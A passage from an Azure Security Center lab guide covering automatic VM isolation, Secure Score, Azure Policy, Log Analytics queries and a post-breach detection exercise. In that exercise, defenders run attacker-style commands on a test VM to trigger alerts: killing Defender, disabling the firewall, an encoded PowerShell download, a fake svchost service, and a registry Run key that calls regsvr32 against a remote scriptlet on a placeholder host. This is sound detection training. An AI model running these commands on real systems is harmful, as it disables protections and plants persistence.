workflow automations with Azure Automation to apply the NSG to a compromised machine.
Create a GitHub account

1. Go here and create a GitHub account https://github.com/join
Page 130
Page 131
Explore the Azure Security Center repository
6.2 Create a Network Security Group

1. From a browser, navigate to http://portal.azure.com and, if necessary, sign in with your
Azure account.
2. Click All Services and search for Network Security Groups.
3. Select Network Security Groups.
4. In the Network security groups blade, click Add.
Page 132
5. In the Create network security group blade, create an NSG named NSG-Isolation in a
new resource group called RG-ASC, and then click Create.
6.3 Create Inbound and Outbound Deny Rules for the new
NSG
1. Browse to the NSG blade in the Azure portal.
2. Select the NSG-Isolation NSG
3. Select “Inbound Rules”, then “Add”
4. Create an inbound rule to deny all traffic as seen below:
Page 133
5. Select “Outbound Security Rules” and create a new rule to deny all outbound traffic as
seen below:
Page 134
6. At this point the NSG is created, but not assigned to anything. The workflow automation
will assign it to a compromised VM.
6.4 Create Azure Automation Account and

Runbook
1. Create an automation account called ASCTest - be sure to let it
create the runas account
https://docs.microsoft.com/en-
us/azure/automation/automation-create-standalone-account
2. Click All Services and search for Automation Accounts.
3. Select Automation Accounts.
4. In the Automation Accounts blade, click Add.
5. Create the Automation Account as seen below. For the Resource
group you can Create a new group or Use existing.
6. Click Refresh in the Automation Accounts blade.

7. Select the ASCTest Automation Account:
8. Before proceeding to creation of a runbook for machine isolation you’ll need to update
Azure Modules of the Automation account. You will use a separate runbook for this, it’s
published on GitHub https://github.com/Microsoft/AzureAutomation-Account-Modules-
Update.
9. Download the script: https://raw.githubusercontent.com/microsoft/AzureAutomation-
Account-Modules-Update/master/Update-AutomationAzureModulesForAccount.ps1
10. Click ASCTest Automation Account and switch to Runbooks.
Page 135
11. Click Import a runbook and select the script you’ve downloaded previously.
Page 136
12. Provide a name, select Runbook type (PowerShell) and add some description. Then click
Create.
13. Click Publish to publish the uploaded runbook.
Page 137
14. Click Start to run the uploaded runbook. Specify two parameters – ResourceGroup name
and automation account name:
15. It might take several minutes to finish the modules update.
16. Make sure the status of the job execution is “Completed” before switching to the next step.
Page 138
17. Switch to Modules.
18. Once the Azure Modules have successfully updated, select Browse gallery.
19. Find the AzureRM.Network and select Import. Click OK.
Page 139
20. In the Automation Accounts blade under Processes Automation select Runbooks.
21. Click Create a runbook.
22. Select Create a new Runbook called ASCTest and the Runbook Type PowerShell, click
Create.
23. After the Runbook is created click Edit, then click Runbooks.
Page 140
24. Replace the ResourceGroupName in the highlighted line by the RG created in prior steps.
param(
[object]$webhookdata
)
$connectionName = "AzureRunAsConnection"
try
{
# Get the connection "AzureRunAsConnection "
$servicePrincipalConnection=Get-AutomationConnection -
Name $connectionName
"Logging in to Azure..."
Add-AzureRmAccount `
-ServicePrincipal `
-TenantId $servicePrincipalConnection.TenantId `
-ApplicationId $servicePrincipalConnection.ApplicationId `
-
CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint
}
catch {
if (!$servicePrincipalConnection)
{
$ErrorMessage = "Connection $connectionName not found."
throw $ErrorMessage
} else{
Write-Error -Message $_.Exception
throw $_.Exception
}
}
#$resourceID = $webhookdata
$vmname = $webhookdata
$rgs = Get-AzureRmResourceGroup
$cnt = 0
foreach ($rg in $rgs)
{
$vmt = Get-AzureRmvm -Name $vmname -
ResourceGroupName $rg.ResourceGroupName -ErrorAction SilentlyContinue
Page 141
if ($vmt)
{
$vminfo=$vmt
$cnt++
}
}
# We don't want to proceed in case there are more than 1 machine found, or no
machines found
if ($cnt -ne 1) {exit}
$nsg = Get-AzureRmNetworkSecurityGroup -ResourceGroupName RG-Sent -Name NSG-

Isolation
#$vmrg = $resourceID.split("/")[-5]
#$vmname = $resourceID.split("/")[-1]
#$vminfo = Get-AzureRmvm -Name $vmname -ResourceGroupName $vmrg
$nics = $vminfo.NetworkProfile.NetworkInterfaces
$nics | foreach {
$nicinfo = Get-AzureRmResource -ResourceId $_.Id
$nic = Get-AzureRmNetworkInterface -
ResourceGroupName $nicinfo.ResourceGroupName -Name $nicinfo.Name
$nic.NetworkSecurityGroup = $nsg
Set-AzureRmNetworkInterface -NetworkInterface $nic
}
25. Copy and paste the script into the Runbook.
Page 142
26. Save and Publish the runbook. Click Yes to confirm.
6.5 Create a Workflow Automation

1. Open Azure Security Center
2. Switch to Workflow automation, then click Add workflow automation
Page 143
3. Name the workflow as IsolateVM, select the existing RG-ASC resource group. For
Trigger Conditions select Threat detection alerts. In the Actions section click on the
link to create a new Logic App.
4. A new tab will be opened. Here you can create a new Logic App for your workflow. Click
on Add button.
Page 144
5. Provide a Name for the Logic App, select a resource group. Click Create to finish Logic
App creation.
6. Go to newly create Logic App. Select the template Blank Logic App.
Page 145
7. In the Search all connectors and triggers field, type Azure Security Center, and select
When an Azure Security Center Alert is created or triggered.
8. Now you can define what happens when you trigger the workflow automation.
9. Click New Step, then Choose an action.
10. Search for and select Azure Automation, Click Create job.
Page 146
11. Select the Tenant, click Sign in
12. Sign-in to your subscription

13. Fill out as follows (using your info) then click Add new parameter and select Runbook
Name.
Page 147
14. Select ASCTest from the drop-down menu.
15. For the field Runbook Parameter webhookData search for and select Compromised
Entity.
Page 148
16. Click Save, then Run. You should get the below result:
17. Now get back to the previous browser tab, click Refresh link, and select your newly
created Logic App from the dropdown list.
Page 149
18. Click Create to finish the workflow automation creation.
19. If we need, we can configure automatic workflow automation execution in case a new
alert of a specific type is registered. Click on Workflow Automation you’ve just
configured.
20. Note the Alert name contains field, which is empty now. You can configure your
workflow automation to automatically run for alerts of a specific type by typing a
substring from the alert name to define what type of alerts your automation should react
on. For example, you can type “exe launched suspicious command” to make Security
Page 150
Center react on the alerts of this type: “Microsoft command-line utility Regsvr32.exe
launched suspicious commands” we expect to see later.
21. Important! Close the window without saving. We’re not going to configure automatic
execution during this scenario as it might lead to inadvertent production machine
isolation. We will be executing the Logic App we created during this exercise manually.
Page 151
6.6 Bypass AppLocker and Remediate
1. Identify a non-production machine that can be used for testing
2. Once you identify a non-production machine capture the current Network Interface.
Important: You will need the Network Interface information in another step when we
attach the isolated VM’s network interface back. Save this information for later.
3. WARNING: The machine will be isolated from the network. Ensure this testing is not
going to impact a production workload.
4. RDP to the test machine
5. Execute the following command to make it appear you are attempting to bypass
AppLocker:
regsvr32.exe /s /u /i:test.sct scrobj.dll
6. Wait a few minutes and identify the alert in Security Center
7. Sort alerts based on Date, click the latest alert.
Page 152
8. Click on the Attacked Resource
9. Review the detail and then click Trigger Logic App button.
Page 153
10. Select the Logic App you’ve created and click Trigger button.
11. You will see a notification that automation was triggered successfully.
12. Verify the NICs associated with the target machine has been moved to the isolation NSG.
Page 154
11. Verify you no longer have network access to the VM
Page 155
6.7 Troubleshooting Runbook
When troubleshooting runbook issues, you need to investigate where the job is failing. Navigate
to the Automation Account you want to investigate.
1. Select the Jobs blade

2. As you can see in the below Status column they all show Completed. It doesn’t mean
there were not errors. You will have to select the Job and further investigate if there are
any errors.
Page 156
3. We can now see that there are 5 Errors that occurred when the job ran. Select the Errors
to view more details.
4. Clicking on the error, you can now see additional information as to why the job failed.
5. It is important to also review the input parameters of the Webhook to make your
expected integration call is being executed properly. In the below example it appears I
am missing something in the Webhook parameters.
Page 157
6. The Webhook input parameters are called from what we entered for our Logic App
(Compromised), when we created the job for an Azure Security Center alert trigger:
7. The Output is another way to verify what is being call in the Webhook. You can see
below that it attempts to pull parameters from Azure but gets nowhere.
Page 158
8. Here is an example of a successful job with no errors. I can get back the information from
the providers on the Subscription, Resource Group, and Network Interface.
Page 159
6.8 Attach the isolated VM’s network interface back to previous
network
Now that the test VM is isolated we will dissociate the isolated NIC and associate its
original NIC.
1. In the NSG-Isolation Network interface select the VM that was isolated.
Page 160
2. Select Dissociate.
3. Go to the NSG and select the VM that was previously isolated, click the Network
Interface, then click Associate.
4. Select the previous network interface before the VM was isolated.

Page 161
Page 162
7 Secure Score
7.1 Introduction to Secure Score

Azure Security Center has two main goals:
• To help you understand your current security situation

• To help you efficiently and effectively improve your security
The central feature in Security Center that enables you to achieve those goals is secure score.
Security Center continually assesses your resources, subscriptions, and organization for security
issues. It then aggregates all the findings into a single score so that you can tell, at a glance,
your current security situation: the higher the score, the lower the identified risk level.
The enhanced Secure Score is shown as a percentage and can be found in both the Overview
and Secure Score page.
Overview page:
Page 163
Secure Score page:
Try Recommendations grouped Security Controls

In the Recommendations page review the health of your resources using the security controls
grouping. Take note of the potential score increase if you remediate the security control group.
Page 164
How the Secure Score is calculated
As part of the enhancements to the Secure Score, recommendations are now grouped
into Security Controls. A control is a set of security recommendations and the instructions that
help you implement those recommendations. Controls are logical groupings of related
recommendations. Points are no longer awarded at the recommendation level. Instead, your
score will only improve when you remediate all of the recommendations for a single resource
within a control.
The contribution of each Security Control towards the overall Secure Score is shown clearly on
the recommendations page.
To get all the possible points for a security control, all your resources must comply with all of
the security recommendations within the security control. For example, Security Center has
multiple recommendations regarding how to secure your management ports. In the past, you
could remediate some of those related and interdependent recommendations while leaving
others unsolved, and your secure score would improve. When looked at objectively, it's easy to
argue that your security hadn't improved until you had resolved them all. Now, you must
remediate them all to make a difference to your secure score.
Page 165
For example, the security control called "Apply system updates" has a maximum score of six
points, which you can see in the tooltip on the potential increase value of the control:
The maximum score for this control, Apply system updates, is always 6. In this example, there are
50 resources. So we divide the max score by 50, and the result is that every resource contributes
0.12 points.
• Potential increase (0.12 x 8 unhealthy resources = 0.96) - The remaining points

available to you within the control. If you remediate all the recommendations in
this control, your score will increase by 2% (in this case, 0.96 points rounded up to
1 point).
• Current score (0.12 x 42 healthy resources = 5.04) - The current score for this
control. Each control contributes towards the total score. In this example, the
control is contributing 5.04 points to current secure total.
• Max score - The maximum number of points you can gain by completing all
recommendations within a control. The maximum score for a control indicates the
relative significance of that control. Use the max score values to triage the issues to
work on first.
Page 166
Page 167
Which recommendations are included in the secure score
calculations?
Only built-in recommendations have an impact on the secure score.
Recommendations flagged as Preview aren't included in the calculations of your secure score.
They should still be remediated wherever possible, so that when the preview period ends they'll
contribute towards your score.
An example of a preview recommendation:
Page 168
Secure score FAQ
• If I address only three out of four recommendations in a security control, will my

secure score change?
No. It won't change until you remediate all of the recommendations for a single resource. To
get the maximum score for a control, you must remediate all recommendations, for all
resources.
• If a recommendation isn't applicable to me, and I disable it in the policy, will my

security control be fulfilled and my secure score updated?
Yes. We recommend disabling recommendations when they're inapplicable in your

environment. For instructions on how to disable a specific recommendation, see Disable
security policies.
• If a security control offers me zero points towards my secure score, should I ignore it?
In some cases, you'll see a control max score greater than zero, but the impact is zero. When
the incremental score for fixing resources is negligible, it's rounded to zero. Don't ignore
these recommendations as they still bring security improvements. The only exception is the
"Additional Best Practice" control. Remediating these recommendations won't increase your
score, but it will enhance your overall security.
Page 169
8 Security Policies
8.1 Introduction to security policies

A security policy defines the desired configuration of your workloads and helps ensure you're
complying with the security requirements of your company or regulators.
Azure Security Center makes its security recommendations based on your chosen policies.
Security Center policies are based on policy initiatives created in Azure Policy. You can use Azure
Policy to manage your policies and to set policies across Management groups and across
multiple subscriptions.
Security Center offers the following options for working with security policies:
• View and edit the built-in default policy - When you enable Security Center, a built-in
initiative named 'ASC default' is automatically assigned to all Security Center registered
subscriptions (Free or Standard tiers). To customize this initiative, you can enable or
disable individual policies within it. See the list of built-in security policies to understand
the options available out-of-the-box.
• Add your own custom policies - If you want to customize the security initiatives applied
to your subscription, you can do so within Security Center. You'll then receive
recommendations if your machines don't follow the policies you create. For instructions on
building and assigning custom policies, see Using custom security policies.
• Add regulatory compliance policies - Security Center's regulatory compliance
dashboard shows the status of all the assessments within your environment in the context
of a particular standard or regulation (such as Azure CIS, NIST SP 800-53 R4, SWIFT CSP
CSCF-v2020). For more information, see Improve your regulatory compliance.
Using custom security policies
To help secure your systems and environment, Azure Security Center generates security
recommendations. These recommendations are based on industry best practices, which
are incorporated into the generic, default security policy supplied to all customers. They
can also come from Security Center's knowledge of industry and regulatory standards.
Create a custom initiative
1. From Security Center's sidebar, open the Security policy page.
Page 170
2. Select a subscription or Management Group to which you would like to add a custom
initiative.
3. In the Security policy page, under Your custom initiatives click Add a custom initiative.
Page 171
The following page appears:
1. In the Add custom initiatives page, review the list of custom policies already created in
your organization. If you see one you want to assign to your subscription, click Add. If
there isn't an initiative in the list that meets your needs, skip this step.
2. To create a new custom initiative:
1. Click Create new.
2. Enter the definition's location and name.
3. Select the policies to include and click Add.
4. Enter any desired parameters.
5. Click Save.
6. In the Add custom initiatives page, click refresh and your new initiative will be shown as
available.
7. Click Add and assign it to your subscription.
Page 172
3. Your new initiative takes effect and you can see the impact in the following two ways:
1. From the Security Center sidebar, under Policy & Compliance, select Regulatory
compliance. The compliance dashboard opens to show your new custom
initiative alongside the built-in initiatives.
2. You'll begin to receive recommendations if your environment doesn't follow the
policies you've defined.
4. To see the resulting recommendations for your policy, click Recommendations blade
from the sidebar to open the recommendations page within one hour.
Adding a dynamic compliance package
The following steps explain how to add the dynamic package for monitoring your compliance
with the Azure CIS benchmark v1.1.0.
Update to the Azure CIS 1.1.0 dynamic compliance package
1. Open the Security policy page. This page shows the number of management groups,
subscriptions, workspaces, and your management group structure.
2. Select the subscription or management group for which you want to manage the
regulatory compliance posture. We recommend selecting the highest scope for which the
standard is applicable so that compliance data is aggregated and tracked for all nested
resources.
3. In the Industry & regulatory standards section, you'll see that Azure CIS 1.1.0 can be
updated for new content. Click Update now.
4. Optionally, click Add more standards to open the Add regulatory compliance
standards page. There, you can search manually for Azure CIS 1.1.0 and dynamic
packages for other compliance standards such as NIST SP 800-53 R4, SWIFT CSP CSCF-
v2020, UKO and UK NHS, and Canada PBMM.
Page 173
5. From Security Center's sidebar, select Regulatory compliance to open the regulatory
compliance dashboard.
o Azure CIS 1.1.0 now appears in your list of Industry & regulatory standards.
o The original static view of your Azure CIS 1.1.0 compliance will also remain alongside
it. It may be automatically removed in the future.
Note: It may take a few hours for a newly added standard to appear in the compliance
dashboard.
Page 174
9 Azure Policy
9.1 What is Azure Policy?

Azure Policy allows you to create, assign and, manage policy definitions. Policy definitions
enforce different rules and actions over your resources, so those resources stay compliant with
your corporate standards and service level agreements. Azure Policy runs an evaluation of your
resources, scanning for those not compliant with the policy definitions you have. For example,
you could have a policy to allow only a certain type of virtual machines. Another might require
that all resources have a particular tag. These policies are then evaluated when creating and
updating resources.
9.2 How is it different from RBAC?

There are a few key differences between policy and role-based access control (RBAC). RBAC
focuses on user actions at different scopes. For example, you might be added to the contributor
role for a resource group at the desired scope. The role allows you to make changes to that
resource group. Policy focuses on resource properties during deployment and for already
existing resources. For example, through policies, you can control the types of resources that
can be provisioned. Or, you can restrict the locations in which the resources can be provisioned.
Unlike RBAC, policy is a default allow and explicit deny system.
To use policies, you must be authenticated through RBAC. Specifically, your account needs the:
• Microsoft.Authorization/policydefinitions/write permission to define a policy.

• Microsoft.Authorization/policyassignments/write permission to assign a policy.
• Microsoft.Authorization/policySetDefinitions/write permission to define initiative.
• Microsoft.Authorization/policyassignments/write permission to assign an initiative.
These permissions are not included in the Contributor role.
https://docs.microsoft.com/en-us/azure/azure-policy/azure-policy-introduction#how-is-it-different-
from-rbac
Page 175
Note
An initiative definition is a collection of policy definitions that are tailored towards
achieving a singular overarching goal. Initiative definitions simplify managing and
assigning policy definitions. They simplify by grouping a set of policies as one single
item.
Policy definition
Every policy definition has conditions under which it is enforced. And, it has an accompanying
action that takes place if the conditions are met.
In Azure Policy, we offer some built-in policies that are available to you by default. For example:
• Require SQL Server 12.0: This policy definition has conditions/rules to ensure that all SQL
servers use version 12.0. Its action is to deny all servers that do not meet these criteria.
• Allowed Storage Account SKUs: This policy definition has a set of conditions/rules that
determine if a storage account that is being deployed is within a set of SKU sizes. Its action
is to deny all servers that do not adhere to the set of defined SKU sizes.
• Allowed Resource Type: This policy definition has a set of conditions/rules to specify the
resource types that your organization can deploy. Its action is to deny all resources that
are not part of this defined list.
• Allowed Locations: This policy enables you to restrict the locations that your organization
can specify when deploying resources. Its action is used to enforce your geo-compliance
requirements.
• Allowed Virtual Machine SKUs: This policy enables you to specify a set of virtual machine
SKUs that your organization can deploy.
• Apply tag and its default value: This policy applies a required tag and its default value, if
it is not specified by the user.
• Enforce tag and its value: This policy enforces a required tag and its value to a resource.
• Not allowed resource types: This policy enables you to specify the resource types that
your organization cannot deploy.
For more sample policies, please visit https://docs.microsoft.com/en-

us/azure/governance/policy/samples/
Page 176
Create a policy assignment
In this quickstart, you create a policy assignment and assign the Audit Virtual Machines
without Managed Disks policy definition.
1. Type “policy” in the search box in top of the Azure Portal and click on Policy.
2. Select Assignments on the left pane of the Azure Policy page.

3. Select Assign Policy from the top of the Assignments pane.
4. On the Assign Policy page, click next to Policy definition field under the
BASICS section to open the list of available definitions.
Page 177
Azure Policy comes with already built-in policy definitions you can use. You see built-in
policy definitions such as:
• Enforce tag and its value

• Apply tag and its value
• Require SQL Server Version 12.0
For a complete list of all the available built-in polices, see Policy templates.
5. Search through your policy definitions to find the Audit VMs that do not use
managed disks definition. Click on that policy and click Select.
Page 178
6. Provide a display Name for the policy assignment. In this case, let’s use Audit
VMs that do not use managed disks. You can also add an optional Description.
The description provides details about how the policy assignment identifies all
virtual machines that don't use managed disks.
7. Select the Scope you would like the policy to be applied to. A scope determines
what resources or grouping of resources the policy assignment gets enforced on.
It could range from a subscription to resource groups.
8. In the Exclusions select you can define at a more granular layer of what you to
exclude from the policy if necessary.
9. Leave Exclusions blank for now and then click Assign.
Page 179
Page 180
Identify non-compliant resources
Select Compliance on the left pane, and search for the policy assignment you created.
Clean up resources
Other guides in this collection build upon this quickstart. If you plan to continue to work with
subsequent tutorials, do not clean up the resources created in this quickstart. If you do not plan
to continue, use the following steps to delete all resources created by this quickstart in the
Azure portal.
1. Select Assignments or Compliance on the left pane.
2. Search for the assignment you created and then right-click it and select Delete
Assignment.
Page 181
Note
You can also use PowerShell and Azure CLI to create, assign and clean-up a policy.
Please refer to the following links for more information.
Use PowerShell to Manage Policy Assignment
Use Azure CLI to Manage Policy Assignment
Azure Policy templates can be found here
1. By default, the security policy doesn’t need editing as everything is enabled. Mainly
review these settings in the cx subscription unless there are specific items the
customer wants disabled.
https://docs.microsoft.com/en-us/azure/azure-policy/azure-policy-introduction
https://docs.microsoft.com/en-us/azure/security-center/security-center-policies-
overview
Prevent misconfigurations
Security misconfigurations are a major cause of security incidents. Security Center now
has the ability to help prevent misconfigurations of new resources with regards to
specific recommendations.
This feature can help keep your workloads secure and stabilize your secure score.
Enforcing a secure configuration, based on a specific recommendation, is offered in two

modes:
• Using the Deny effect of Azure Policy, you can stop unhealthy resources
from being created
• Using the Enforce option, you can take advantage of Azure
policy's DeployIfNotExist effect and automatically remediate non-
compliant resources upon creation
Page 182
Prevent resource creation
1. Open the recommendation that your new resource and select the Deny button at the top
of the page. Important: This exercise is to walk you thru how to configure a Deny policy.
If you configure this policy, it will prevent a new resource from being created if you don’t
configure secure transfer to storage accounts at the time you are creating the resource.
You don’t have to change this recommended to a Deny at this time.
2. Set the scope by selecting the relevant subscription or management group.

3. You can use the three dots at the end of the row to change a single subscription, or use
the checkboxes to select multiple subscriptions or groups then select Change to Deny.
Page 183
Enforce a secure configuration
1. Open the recommendation that you'll deploy a template deployment for if new
resources don't satisfy it, and select the Enforce button at the top of the page.
Important: If you configure this policy auditing with automatically be configuring
on SQL servers. You don’t have to configure this policy at this time.
Page 184
The configuration pane opens with all of the policy configuration options.
1. Set the scope, assignment name, and other relevant options.

2. Select Review + create.
Page 185
Examples of Recommendations with deny/enforce options
These recommendations can be used with the deny option:
• Virtual machines should be migrated to new Azure Resource Manager resources

• Storage accounts should be migrated to new Azure Resource Manager resources
• All authorization rules except RootManageSharedAccessKey should be removed
from Event Hub namespace
• All authorization rules except RootManageSharedAccessKey should be removed
from Service Bus namespace
• Secure transfer to storage accounts should be enabled
• Only secure connections to your Redis Cache should be enabled
• Automation account variables should be encrypted
• Service Fabric clusters should only use Azure Active Directory for client
authentication
• Service Fabric clusters should have the ClusterProtectionLevel property set to
EncryptAndSign
• Audit unrestricted network access to storage accounts
These recommendations can be used with the enforce option:
• Diagnostic logs in Logic Apps should be enabled

• Diagnostic logs in Data Lake Analytics should be enabled
• Diagnostic logs in IoT Hub should be enabled
• Diagnostic logs in Batch accounts should be enabled
• Diagnostic logs in Azure Stream Analytics should be enabled
• Diagnostic logs in Service Bus should be enabled
• Diagnostic logs in Search services should be enabled
• Diagnostic logs in Event Hub should be enabled
• Diagnostic logs in Virtual Machine Scale Sets should be enabled
• Diagnostic logs in Key Vault should be enabled
• Auditing on SQL server should be enabled
• Advanced data security should be enabled on your SQL servers
Page 186
10 Log Analytics
Here we’ll give some examples of searches for security data.
https://docs.microsoft.com/en-us/azure/security-center/security-center-search
10.1 All Security Events

Query Description
SecurityEvent All security events in the workspace
10.2 Failed logons

Query Description
SecurityEvent | where EventID == 4625 | summarize count() by Failed logons by number of times
TargetAccount
When you build a query, you start by determining which tables have the data that you're
looking for. Each data source and solution stores its data in dedicated tables in the Log Analytics
workspace. Documentation for each data source and solution includes the name of the data
type that it creates and a description of each of its properties. Many queries will only require
data from a single table, but others may use a variety of options to include data from multiple
tables.
10.3 Computers with most errors

Query Description
Event Top ten computers with the most error events

over the past day.
| where (EventLevelName == "Error")
| where (TimeGenerated > ago(1days))
| summarize ErrorCount = count() by Computer
| top 10 by ErrorCount desc
Page 187
10.4 Heartbeat missing in the last day
Query Description
Heartbeat Computers that haven't had a heartbeat in the

last day.
| summarize max(TimeGenerated) by Computer
| where max_TimeGenerated < ago(1d)
10.5 Processor utilization over the last week

Query Description
Perf A line chart with the processor utilization for

each computer from last week.
| where ObjectName == "Processor" and CounterName == "%
Processor Time"
| where TimeGenerated between (startofweek(ago(7d)) ..

endofweek(ago(7d)) )
| summarize avg(CounterValue) by Computer, bin(TimeGenerated,

5min)
| render timechart
You can see from these quick samples that regardless of the kind of data that you're working
with, the structure of the query is similar. You can break it down into distinct steps where the
resulting data from one command is sent through the pipeline to the next command.
Page 188
10.6 Query data across workspaces
You can also query data across Log Analytics workspaces within your subscription.
Query Description
union Update, workspace("contoso-workspace").Update Query data across Log Analytics workspaces

within your subscription.
| where TimeGenerated >= ago(1h)
| summarize dcount(Computer) by Classification
For complete documentation on the Azure Log Analytics query language including tutorials and
language reference, see the Azure Log Analytics query language documentation.
Page 189
11 Post-Breach Threat Detections
Azure Sentinel is designed for threat hunting scenarios, but due to integration with Log
Analytics, Azure Security Center can still be used without Sentinel being present.
Note
Don’t forget that ASC can onboard servers into Microsoft Defender for Endpoint, which
provides great threat hunting and investigation capabilities via
https://securitycenter.windows.com/
In this hunting scenario there is an assumption that the attacker is already inside the network
and has already compromised a computer. Now the attacker is continuing their mission and
performing some post-breach activity.
11.1 Pre-requisites
You will need at least one Windows Server 2016 Virtual Machine (Azure VM), and the tools used
in this workflow automation are Windows Server built-in tools. To collect Windows Filtering
Platform Event ID 5156, which will be used during the hunting, make sure to run the commands
below:
Auditpol /set /subcategory:"Filtering Platform Connection" /Success:Enable
Gpupdate/force
Also, make sure you have a temp folder under c:\ drive (c:\temp) on this VM
Enable remote administration in the VM using the command below:
netsh firewall set service remoteadmin enable
Go back to section 2.3 and confirm the data collection to “All Events”
Confirm that the Server 2016 VM to be used is showing up in ASC as “Monitored”:
Page 190
Page 191
11.2 Executing the Attack
The steps that follow assumes that the attacker has already compromised the machine, in the
cyber kill chain this means that the attacker already passed the Target and Attack phases of the
kill chain. Now the attacker is moving to the Installation and Exploitation phase.
Cyber kill chain phase: Install and Exploit.
In this simulation you will verify which user is currently logged in the system, obtain system
information, and obtain information about sessions on a Remote Desktop Session Host (RD
Session Host), try to terminate the antimalware process, and try to disable windows firewall for
all profiles.
Execute the steps below:
1. Logon to the VM and open and administrative cmd prompt and execute the
following commands:
(a) Whoami
(b) Systeminfo
(c) Qwinsta
(d) Taskkill /f /im msmpeng.exe
(e) Netsh advfirewall set currentprofile state off
(f) Netsh advfirewall set domainprofile state off
(g) Netsh advfirewall set allprofiles state off
Cyber kill chain phase: Post-Exploit.
In this simulation you will use PowerShell with the -EncodedCommand parameter to encode a
string into base64. This string is the path to download a file from an external site. Attackers use
this technique to obfuscate attacks at runtime.
2. Open powershell and execute:

powershell -nop -exec bypass -EncodedCommand
"cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJgAg
AHsAIABpAHcAcgAg
AGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALgBzAHkAcwBpAG4
AdABlAHIAbgBhAGwAc
wAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AUwB5AHMAbQBvAG4ALgB6AGkAcAAg
AC0ATwB1AHQARgBpAG
Page 192
wAZQAgAGMAOgBcAHQAZQBtAHAAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUA
IAB9ACIA"
The command line that is encoded has the following command:
powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile

c:\temp\svchost.exe }"
Note: the intent of this command is to simulate the download of a file from an external location,
and save it in the local folder with a different name. Now the attacker is going to try to establish
persistence by creating a service based on the file that was downloaded.
Notice that the second command below will fail, but for this example, the attempt to start is
already enough.
Now run the following commands, you should receive an error 216 – this is expected:
3. Sc.exe create “svvchost” binpath=”C:\temp\svchost.exe”

4. Sc.exe start svvchost
5. Md c:\programs
6. Cd\programs
7. Copy c:\windows\system32\svchost.exe
8. Create a text file called 23st34s1.txt in the programs folder
9. Edit this in notepad and add the following address:
http://www.contoso.com/stext.js
10. Save the file and back in cmd prompt run: svchost.exe 23st34s1.txt
11. Finally, to continue persistence the attacker can add a registry entry to download
a malicious program on restart. (Note that this does not actually download any
file.) To simulate this, run:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "start" /d
"regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f
11.3 Reviewing Security Center Alerts

The first part of the hunt is to use Azure Security Center dashboard to review the alerts. By the
time you finish all the previous steps, you should have a sequence of alerts similar to the ones
that follows: Suspicious PowerShell Activity Detected
Page 193
Notice that Security Center was able to decode the original PowerShell encoded command and
expose the script that was running on it. Having this information can be important during the
hunt, since you already know what was downloaded.
Page 194
Suspicious SVCHOST process executed
Page 195
Suspicious Activity Detected
The description of this alert emphasizes the fact that this sequence has historically been
associated with malicious activity, and the alert gives you the list of the commands that were
executed.
Page 196
Windows registry persistence method detected
This command will trigger two alerts, the first is the registry persistency as shown above, and
the other one is the attempt to bypass AppLocker, as shown below.
Page 197
Potential attempt to bypass AppLocker detected
The regsvr32 utility can be used to request and execute the script from the webserver
controlled by the attacker. On hosts where tight AppLocker executable and script rules are
enforced, attackers are often seen using regsvr32 and a script file located on the Internet to
attempt a script rule bypass and run their malicious script.
Page 198
11.4 Using Log Analytics to Hunt Threats
Note
The Search menu entry point in Security Center will be removed in July 2019, but that Log
Analytics->Workspace->Logs can still be used as the entry point for these techniques.
1. Go to your Log Analytics workspace that your VM is reporting to and select Logs.
2. Under the Run button
3. Run the following Search Query:
SecurityEvent
| where CommandLine contains “regsvr32”
Example:
You should receive the result that contains a table of values that include a lot of columns,
including the TenantID, TimeGenerated, SourceSystem, Account, and many others. While it is
good to have this information, sometimes you don’t need to see all that. In order to optimize
the output and focus only on what you need, you can use the Project operator to list only the
columns that are relevant for your hunt. Type the query below and click Run: SecurityEvent
| where CommandLine contains "regsvr32"
| project TimeGenerated , Computer , Account , CommandLine , SubjectLogonId
It is always a good idea to see what commands were executed in the proximity of your point of
reference (which in this case is the execution of regsvr32). Basically, you want to understand
what else was executed before. To accomplish that you need two new parameters:
Page 199
• Query for Event ID 4688, which is generated every time a new process starts.
• Use the TimeGenerated field, and the numerical operators greater or equal and less or
equal to query a specific range of time.
Use the following query as your base, but you need to replace the TimeGenerated field to
match with your own environment. Keep in mind that the time range may vary, you can start
with a short time range and continue to expand until you find more relevant information. Make
sure to play around with the range and see which results you will get it.
SecurityEvent
| where TimeGenerated >= todatetime('2018-07-30T19:10:05.727') and
TimeGenerated <= todatetime('2018-07-30T19:35:05.727')
| where EventID == "4688"
| order by TimeGenerated asc
An example of this output is shown below:
In a production environment, it is possible that this query will generate a lot of results, and at
this point you want to focus your attention on the commands that were executed within the
same session. You can use the SubjectLogonId field to narrow your query. Use the following
query as your base, but you need to replace the SubjectLogonId field to match the
SubjectLogonId of the regsvr32 execution in your own environment:
SecurityEvent
| where TimeGenerated >= todatetime('2018-07-30T19:10:05.727') and
TimeGenerated <= todatetime('2018-07-30T19:35:05.727')
| where SubjectLogonId == "0x8c375"
| order by TimeGenerated asc
Page 200
An example of this output is shown below:
We have now narrowed down the commands that were executed in the same session. This can
help to understand more about the commands that were executed prior and after the regvr32.
However, Azure Security Center already trigged an alert about the PowerShell execution. Now
you have another reference point to investigate. Type the query below and click Run:
SecurityEvent
| where Process contains "powershell.exe" and CommandLine contains " -enc"
| extend b64 = extract("[A-Za-z0-9|+|=|/]{30,}", 0,CommandLine)
| extend utf8_decode=base64_decodestring(b64)
| project TimeGenerated , Computer, CommandLine, utf8_decode, SubjectLogonId
The query above will use the extend operator to show the encoded command line and decode
value. From here you can get the new SubjectLogonId and change the query to filter only for
that session. This decoded string shows that Powershell is accessing an external website to
download a tool. In a realworld scenario, this is a common practice in the post-breach phase,
mainly when the attacker is trying to access command and control to download malware. It is a
good idea to validate which external IP address PowerShell is trying to contact. For that we will
take advantage of the event ID 5156, which is created each time that Windows Filtering
Platform allows a program to connect to another process on the same computer or remote
using TCP or UDP port. Type the query below and click Run:
SecurityEvent
| where tostring(EventData) contains "powershell"
| project Computer, EventData
| extend X = parse_xml(EventData)
| extend Application = X.EventData.Data[1]["#text"]
| extend SourceAddress = X.EventData.Data[3]["#text"]
| extend DestAddress = X.EventData.Data[5]["#text"]
